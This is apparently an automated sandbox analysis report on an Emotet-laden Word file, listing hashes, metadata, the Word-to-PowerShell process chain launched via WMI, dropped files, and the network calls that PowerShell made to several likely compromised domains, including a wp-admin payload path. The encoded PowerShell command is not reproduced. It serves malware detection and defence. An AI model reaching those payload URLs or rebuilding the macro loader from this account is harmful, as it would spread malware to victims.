File name: Report.doc
Full analysis: https://app.any.run/tasks/5788a647-6abb-4f87-b444-492bde931f1f
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 17:20:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Expressway, Subject: Rubber, Author: Wilhelm Reynolds, Keywords: Ergonomic Rubber Cheese, Comments: integrated, Template: Normal.dotm, Last Saved By: Imani Kreiger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:06:00 2019, Last Saved Time/Date: Mon Oct 14 15:06:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0
MD5: 634FB174EB760789B41E3AE8EF70AD7A
SHA1: 6DAEAA9B5DE6145D811BF995CB541FBF4213D71B
SHA256: 8027F994B15A87A2979B7BC3D2859FE870F4E48390F4111A8CB2A5BDEC3ADE87
SSDEEP: 3072:6qfzpFOKgdzSrGpKyIwLx3kV3ggo7V1FjDQJ1dLHHRBgD:6qfzpFOKUzSGnLx3kgjirnvg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    No malicious indicators.
  • SUSPICIOUS
    • PowerShell script executed
      • powershell.exe (PID: 3716)
    • Creates files in the user directory
      • powershell.exe (PID: 3716)
    • Executed via WMI
      • powershell.exe (PID: 3716)
  • INFO
    • Reads settings of System Certificates
      • powershell.exe (PID: 3716)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 960)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 960)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Parker
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 203
Paragraphs: 1
Lines: 1
Company: Carter - Mohr
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 174
Words: 30
Pages: 1
ModifyDate: 2019:10:14 14:06:00
CreateDate: 2019:10:14 14:06:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Imani Kreiger
Template: Normal.dotm
Comments: integrated
Keywords: Ergonomic Rubber Cheese
Author: Wilhelm Reynolds
Subject: Rubber
Title: Expressway
No data.
Total processes: 39
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph

start → winword.exe → powershell.exe (interactive graph available in the full report)

Process information

PID: 960
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Report.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3716
CMD: powershell -e [base64-encoded command not reproduced in this copy of the report]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 2 154
Read events: 1 312
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 17

Dropped files

PID 960, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVRA87F.tmp.cvr
  MD5: -
  SHA256: -
PID 3716, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGER12DZ6DQHPPYMHPPE.temp
  MD5: -
  SHA256: -
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAE2913C.wmf (type: wmf)
  MD5: 451CCEC4E80B63056C7CF44829B810BB
  SHA256: 595D2B89005D0DCEECD29F64ADDF470CC69655E5C891713277D0A30BDE29FB66
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14FCD6AA.wmf (type: wmf)
  MD5: 2EED3F8E631BCCE318BE8B4AC8FC2F8A
  SHA256: 0634DCDFEB01C38C45867535C142801F51A44D0848E28E883447E00A11CC0FF6
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24CCB12.wmf (type: wmf)
  MD5: 46243598CFCA7B4DE308E6E240E2304E
  SHA256: 7C507E3B0F47BF6E6CD4A6D16B2ED373F587D0B822D42D645728BB269D20B1DB
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Report.doc.LNK (type: lnk)
  MD5: 6F9D4EC83961B17A8EBF41D1A3005F50
  SHA256: 27BD71F82111F147E56A3CC6E48C4EFD216D76824D3380BAB6566B1CDF704A26
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27B5ECF0.wmf (type: wmf)
  MD5: E277012212BE3BCEA8C46356205FDFDB
  SHA256: 633B58C0DC4C70A2468B84E5C1C6FAD82260D41E1A92051878473D0F20AE7CD1
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (type: pgc)
  MD5: CD2805DEB24A441BA9466FB0D3D77392
  SHA256: 9AFA3B2D5AB87B1B00646B7B67818D015F82E4AB373CDE74536F4870809D3137
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE9A7B64.wmf (type: wmf)
  MD5: 1F0883953E0ED2453BF029CE85412531
  SHA256: 1FB621CF1AB0D3FF6592B9F20FB8FCBCEFA4BEB5363190796D7CED7A74AEE676
PID 960, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd (type: tlb)
  MD5: 30CBE5E535C4F181884515A89AC51856
  SHA256: B5B5E76D494C195EEFE2B0A0E08914F37780E4F6ACEA9D4F2E8A94A246D7BE1D
HTTP(S) requests: 1
TCP/UDP connections: 5
DNS requests: 7
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3716 | powershell.exe | GET | 404 | 35.196.42.152:80 | http://nuttlefiberart.com/wp-admin/eIDCaO/ | US | xml | 345 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3716 | powershell.exe | 104.27.142.41:443 | www.merceko.com | Cloudflare Inc | US | unknown
3716 | powershell.exe | 78.142.210.165:443 | kampusmania.com | JSC Mediasoft ekspert | RU | unknown
3716 | powershell.exe | 35.196.42.152:80 | nuttlefiberart.com | Google Inc. | US | unknown
3716 | powershell.exe | 161.117.183.16:443 | vps333.com | - | SG | unknown
3716 | powershell.exe | 104.31.95.133:443 | filegst.com | Cloudflare Inc | US | shared

DNS requests

Domain | IP | Reputation
filegst.com | 104.31.95.133, 104.31.94.133 | unknown
www.merceko.com | 104.27.142.41, 104.27.143.41 | unknown
kampusmania.com | 78.142.210.165 | unknown
vps333.com | 161.117.183.16 | unknown
nuttlefiberart.com | 35.196.42.152 | unknown

Threats

No threats detected
No debug info